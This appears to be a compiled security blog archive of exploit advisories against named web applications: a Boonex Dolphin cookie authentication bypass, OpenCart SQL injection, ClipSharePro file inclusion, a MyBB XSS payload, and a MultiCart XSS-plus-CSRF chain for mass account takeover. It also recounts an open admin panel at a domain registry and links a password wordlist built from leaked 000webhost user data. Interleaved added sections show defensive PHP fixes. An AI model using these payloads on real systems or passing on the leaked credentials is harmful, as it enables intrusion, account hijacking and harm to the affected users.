# Exploit Title : Boonex Dolphin all versions <= 7.3 Authentication Bypass
# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link : https://www.boonex.com
# Author HomePage : http://security-geeks.blogspot.com
Proof of Concept
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
$passwd is taken from the Cookie parameter memberPassword.
Bug:
According to the PHP documentation strcmp() compares two strings, but what if we provide an array instead? On PHP 5 and 7, strcmp() emits a warning and returns NULL when one operand is an array, and NULL != 0 evaluates to false, so the rejection branch is never taken. (PHP 8 throws a TypeError for the same call, so the bypass depends on the PHP version.)
So a simple bypass is to set two cookies in the browser:
memberID=1
memberPassword[]=blah ---> array
This allows the attacker to bypass authentication and also enter the admin panel.
#Independent Pakistani Security Researcher
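The type juggling behind the bypass, as an added example (this is not Dolphin's code): a stand-in for the admin.inc.php check next to a hardened version. The cookie array and the stored hash value are constructed for the demo, and hash_equals() needs PHP 5.6 or later.

```php
<?php
// Added example (not Dolphin code). Shows how an array-valued cookie slips
// past the strcmp() check quoted from admin.inc.php, and a fixed version.
// The hash in $aProfile['Password'] is invented for the demo.

function isAuthenticatedVulnerable($storedPassword, $cookiePassword) {
    // Dolphin's check: reject when the strings differ.
    // PHP 5.x/7.x: strcmp() with an array operand warns and returns NULL,
    // and NULL != 0 is false, so this branch is skipped.
    // PHP 8: the same call throws TypeError instead.
    if (strcmp($storedPassword, $cookiePassword) != 0) {
        return false;
    }
    return true;
}

function isAuthenticatedFixed($storedPassword, $cookiePassword) {
    // Refuse anything that is not a string before comparing, then use a
    // constant-time comparison so timing does not leak the hash either.
    if (!is_string($cookiePassword)) {
        return false;
    }
    return hash_equals($storedPassword, $cookiePassword);
}

// Constructed request: memberID=1 and memberPassword[]=blah, as PHP parses them.
$cookies  = ['memberID' => '1', 'memberPassword' => ['blah']];
$aProfile = ['ID' => 1, 'Password' => '5f4dcc3b5aa765d61d8327deb882cf99']; // invented hash

try {
    var_dump(isAuthenticatedVulnerable($aProfile['Password'], $cookies['memberPassword']));
} catch (TypeError $e) {
    echo "PHP 8: " . $e->getMessage() . "\n";
}
var_dump(isAuthenticatedFixed($aProfile['Password'], $cookies['memberPassword']));
```

On PHP 5 and 7 the first call prints a warning and returns true: strcmp() returned NULL for the array operand and NULL != 0 is false. On PHP 8 the same call throws TypeError, which is caught here. The hardened version returns false on every version because the type check runs before the comparison.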
Hi, after a long time... today I am going to show you a PoC for pwning the .ug TLD, which I did some 3-4 years back.
Years back the interface of the registry was http://old.registry.co.ug/ and the "Domain Manager Panel" sub-domain was not exposed on the TLD's main domain or in search engines.
So, after doing some information gathering, e.g. port scanning, whois lookups etc., I found the domain panel, which was located at https://new.registry.co.ug:8006/
I am not going into a detailed explanation of how I do a pentest; rather I will show you the main weakness, a "direct object reference".
So, after trying hard for RCE, SQLi, server vulnerability enumeration etc., I found a direct object reference to the admin panel.
To enter the domain manager as admin you just had to browse to the URL below:
https://new.registry.co.ug:8006/admin
There was no validation of users via sessions or any other mechanism, so the admin URL could simply be loaded directly. I was able to see everything in the admin panel, including changing the DNS of any domain such as google, MSN etc.
At that time I tried to contact them but didn't get any response, and later in 2013 and 2015 someone hacked and changed the DNS of some domains like google.co.ug, MSN etc.
When I came to know of the defacement I rechecked the vulnerability, but this time it had been patched by them (after the defacement). But it is still vulnerable to direct object reference in many other places.
Will come up with some more cool Hack Diaries - Happy Hacking ;)
Hi, I have just extracted the passwords from the leaked 000webhost data and made a wordlist for hash cracking :).
You can find it here
https://drive.google.com/open?id=0B_ysNAZFtakdRlg5N0pvV01jSGs
Hi, so today we have SQL injection in OpenCart.
I discovered this bug several months ago when I pentested OpenCart and found a CSRF in it too. You can check the CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot of SQLi in it.
So here it is..
http://www.exploit-db.com/exploits/32520
http://packetstormsecurity.com/files/125867/OpenCart-1.5.6.1-SQL-Injection.html
http://cxsecurity.com/issue/WLB-2014030212
http://1337day.com/exploit/description/22071
# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
# Date : 2014/3/26
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#OpenCart suffers from multiple SQL injections in ebay.php. The bug is more about
privilege escalation, as the attacker needs openbay module access (an admin-side account with the OpenBay permission) to reach the vulnerable code.
PoC
Poorly coded file full of SQLi: opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitized.
public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);
$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
The function is called in many locations and the parameter is passed through without being sanitized.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comes straight from the GET query string.
Similarly, more:
public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More:
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
The user must have openbay module access. PoC request (the token is the admin session token from the URL):
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
#Independent Pakistani Security Researcher
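The getEbayItemId() pattern rebuilt in two forms, as an added example (not OpenCart's own code): the string-concatenated original next to a parameterised version, run against an in-memory SQLite database so the effect of a product_id=1'-style payload can be seen without a MySQL server. The DB_PREFIX value, the table layout and the rows are constructed for the demo, and pdo_sqlite is assumed to be available.

```php
<?php
// Added example (not OpenCart code): the query from ebay.php in its
// vulnerable shape and a fixed shape, executed against SQLite in memory.
// DB_PREFIX, the table and the rows below are constructed for the demo.
define('DB_PREFIX', 'oc_');

function setupDb() {
    $db = new PDO('sqlite::memory:'); // pdo_sqlite assumed available
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE `" . DB_PREFIX . "ebay_listing` (`product_id` INTEGER, `ebay_item_id` TEXT, `status` INTEGER)");
    $db->exec("INSERT INTO `" . DB_PREFIX . "ebay_listing` VALUES (1, 'ITEM-0001', 1), (2, 'ITEM-0002', 1), (3, 'ITEM-0003', 0)");
    return $db;
}

// Vulnerable: same shape as ebay.php, $product_id is interpolated into the SQL text.
function getEbayItemIdVulnerable(PDO $db, $product_id) {
    $sql = "SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '" . $product_id . "' AND `status` = '1' LIMIT 1";
    return $db->query($sql)->fetchColumn();
}

// Fixed: cast the id to int (OpenCart's usual idiom for ids) and bind it,
// so the value can never change the structure of the statement.
function getEbayItemIdSafe(PDO $db, $product_id) {
    $stmt = $db->prepare("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = :pid AND `status` = 1 LIMIT 1");
    $stmt->execute([':pid' => (int)$product_id]);
    return $stmt->fetchColumn();
}

$db = setupDb();

// Benign id: both forms return the same listing.
var_dump(getEbayItemIdVulnerable($db, '2'));
var_dump(getEbayItemIdSafe($db, '2'));

// Attacker-controlled id in the PoC's shape: the quote closes the literal,
// OR 1=1 widens the match and "-- " comments out the status filter, so the
// vulnerable form hands back a listing for a product id that does not exist.
$payload = "0' OR 1=1 -- ";
var_dump(getEbayItemIdVulnerable($db, $payload));
var_dump(getEbayItemIdSafe($db, $payload));
```

The (int) cast alone would already neutralise this particular payload (it becomes 0), but binding the value is what makes the statement safe for every caller, including the ones in the admin controllers that pass GET parameters straight through.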
http://cxsecurity.com/issue/WLB-2014030063
# Exploit Title : ClipSharePro <= 4.1 Local File Inclusion
# Date : 2013/3/9
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.clip-share.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Local File Inclusion
ClipSharePro is a paid YouTube clone script; it suffers from a Local File Inclusion vulnerability through
which an attacker can include an arbitrary file in the web app.
LFI in ubr_link_upload.php. Note that the vulnerable branch is only reached when $MULTI_CONFIGS_ENABLED is set; otherwise $DEFAULT_CONFIG is required and the config_file parameter is ignored.
PoC code
if ($MULTI_CONFIGS_ENABLED) {
    if (isset($_GET['config_file']) && strlen($_GET['config_file']) > 0) {
        $config_file = $_GET['config_file'];
    } else {
        showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1);
    }
} else {
    $config_file = $DEFAULT_CONFIG;
}
// Load config file
require $config_file; // includes an arbitrary file taken from $_GET['config_file']
echo $config_file;
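How the same control flow looks with the include restricted to an allowlist inside a fixed directory, as an added example (not ClipSharePro's code). The config directory, the file names, the allowlist and the helper names are assumptions constructed for the demo.

```php
<?php
// Added example (not ClipSharePro code): a safe replacement for
// `require $_GET['config_file']`. The config directory, file names and
// allowlist below are assumptions constructed for the demo.

function resolveConfigFile($requested, $configDir, array $allowed) {
    // Only a fixed set of names is accepted, so the request never chooses a path.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        return null;
    }
    // Resolve symlinks and ".." and confirm the result is still inside $configDir.
    $base = realpath($configDir);
    $path = realpath($configDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Same control flow as ubr_link_upload.php, with the resolver in place of the raw require.
function loadConfig($multiConfigsEnabled, $defaultConfig, $configDir, array $allowed, array $get) {
    if ($multiConfigsEnabled) {
        $name = isset($get['config_file']) ? $get['config_file'] : '';
    } else {
        $name = $defaultConfig;
    }
    $path = resolveConfigFile($name, $configDir, $allowed);
    if ($path === null) {
        return null; // caller shows an error instead of including anything
    }
    require $path;
    return $path;
}

// Constructed fixture: a temporary config directory holding two config files.
$configDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'clipshare_demo_' . getmypid();
mkdir($configDir);
file_put_contents($configDir . '/default.php', "<?php // default config\n");
file_put_contents($configDir . '/site2.php',   "<?php // second site config\n");
$allowed = ['default.php', 'site2.php'];

$attempts = [
    'site2.php',                         // legitimate multi-config request
    '../../../../etc/passwd',            // traversal, the LFI payload shape
    'php://filter/resource=default.php', // stream wrapper
    ['default.php'],                     // array instead of a string
];
foreach ($attempts as $attempt) {
    $result = loadConfig(true, 'default.php', $configDir, $allowed, ['config_file' => $attempt]);
    $label  = is_array($attempt) ? 'array' : $attempt;
    echo str_pad($label, 36) . ' => ' . ($result === null ? 'rejected' : 'included ' . basename($result)) . "\n";
}

unlink($configDir . '/default.php');
unlink($configDir . '/site2.php');
rmdir($configDir);
```

The allowlist is the real control; the realpath() prefix check is a second line of defence in case the allowlist is later loosened to accept user-supplied names. Only the first attempt is included, the other three are rejected before anything is loaded.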
Hi, I didn't update the blog for some time as I was busy with some other stuff, but from now on some cool stuff is coming which I found but didn't publish.
MyBB XSS: some days back I found an advisory for an XSS in search.php.
Reference : http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day/
After reading the article and reviewing the code a little, I found the same type of function was coded for searching private messages.
So I fuzzed the same input strings the author used against search.php and found private.php also vulnerable to XSS.
function privatemessage_perform_search_mysql
----in /inc/function_search.php
called in private.php
private.php
POST parameter: keywords
Data: <script>alert(/Saadi/)</script>qor'("\2a</script>
PoC
Moreover, MyBB 1.8 alpha is also vulnerable on private.php..
So this is for today ;)
#Independent Pakistani Security Researcher
# Exploit Title : iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScripts MultiCart is a paid shopping cart system; it suffers from XSS and cross-site request forgery vulnerabilities through which
an attacker can manipulate user data by sending the user a maliciously crafted URL.
XSS in product review: a lot of exploitation can be done, as the injected code executes whenever the product is visited by clients.
In Product_review.php line 52--- Persistent XSS
mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
$_POST['txtReview'] is inserted without sanitizing and later rendered on the product page without encoding.
Exploitation
Go to http://site.tld/product_review.php?pid=[any product id]
Paste your XSS vector and submit.
The XSS vector will be executed here:
http://site.tld/productdetails.php?productid=1 --> the same product id for which you submitted the review.
# Cross-site request forgery
<html>
<body onload="document.forms[0].submit()">
<form name="ex" action="http://localhost/profile.php" method="post">
<input type="hidden" name="userid" value="5">
<input type="hidden" name="txtFirstName" value="admin">
<input type="hidden" name="txtLastName" value="admin">
<input type="hidden" name="txtEmail" value="admin@gmail.com">
<input type="hidden" name="txtAddress1" value="asdf">
<input type="hidden" name="txtCity" value="saf">
<input type="hidden" name="bill_country" value="DZ">
<input type="hidden" name="bill_state" value="adsf">
<input type="hidden" name="btnSaveChanges" value="Save Changes">
<input type="submit" name="btnSaveChanges" class="button" value="Save">
</form>
</body>
</html>
# XSS+CSRF Mass Email Change / Mass Account Takeover
XSS+CSRF can be used to change many users' email addresses at once; after changing the email we can change the password too via the forgot-password option, by providing that email.
Just inject the CSRF page as an iframe in the XSS vector on product_review.php.
E.g.
<iframe src="http://www.site.tld/inject.html"></iframe>
inject.html ---> the CSRF exploit page above
So now whenever a logged-in user browses the poisoned products, their email is changed automatically.
#Independent Pakistani Security Researcher
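The two server-side controls that break the stored-XSS to CSRF chain described above, as an added example (not iScripts MultiCart code): output encoding for the stored review and a synchronizer token check for profile.php, with the account taken from the session rather than the posted userid field the forged form supplies. The session is modelled as a plain array and the function names are assumptions for the demo; random_bytes() needs PHP 7 and hash_equals() PHP 5.6 or later.

```php
<?php
// Added example (not iScripts MultiCart code): the controls that stop the
// stored XSS from firing and the forged profile.php POST from succeeding.
// Session storage is a plain array and the function names are assumptions.

// 1. Output encoding on productdetails.php: the stored review is encoded
//    when rendered, so an <iframe> payload becomes visible text.
function renderReview($vDes) {
    return htmlspecialchars($vDes, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 2. Synchronizer token for profile.php: issued per session, embedded in the
//    genuine form, required on every POST that changes state. The forged form
//    loaded from the iframe cannot read the victim's token.
function issueCsrfToken(array &$session) {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function verifyCsrfToken(array $session, $submitted) {
    return isset($session['csrf_token'])
        && is_string($submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

// profile.php handler sketch: the account to update comes from the session,
// never from the posted userid field.
function handleProfileUpdate(array $session, array $post) {
    if (!isset($session['sess_userid'])) {
        return 'not logged in';
    }
    $token = isset($post['csrf_token']) ? $post['csrf_token'] : null;
    if (!verifyCsrfToken($session, $token)) {
        return 'rejected: bad or missing CSRF token';
    }
    // Here the row for $session['sess_userid'] would be updated with a
    // parameterised query using the validated $post fields.
    return 'updated user ' . $session['sess_userid'];
}

// Constructed data: the iframe payload from the advisory, a victim session,
// the forged POST (no token) and a genuine POST (with token).
$payload = '<iframe src="http://www.site.tld/inject.html"></iframe>';
echo renderReview($payload) . "\n";

$session = ['sess_userid' => 5];
$token   = issueCsrfToken($session);

$forged  = ['userid' => '5', 'txtEmail' => 'admin@gmail.com', 'btnSaveChanges' => 'Save Changes'];
$genuine = $forged + ['csrf_token' => $token];

echo handleProfileUpdate($session, $forged) . "\n";
echo handleProfileUpdate($session, $genuine) . "\n";
```

The encoded review prints as literal `&lt;iframe ...&gt;` text instead of loading inject.html, and the forged request is rejected while the genuine one with the session token goes through. Encoding on output is what matters for the XSS: the stored value can stay as submitted, it just must never reach the page unencoded.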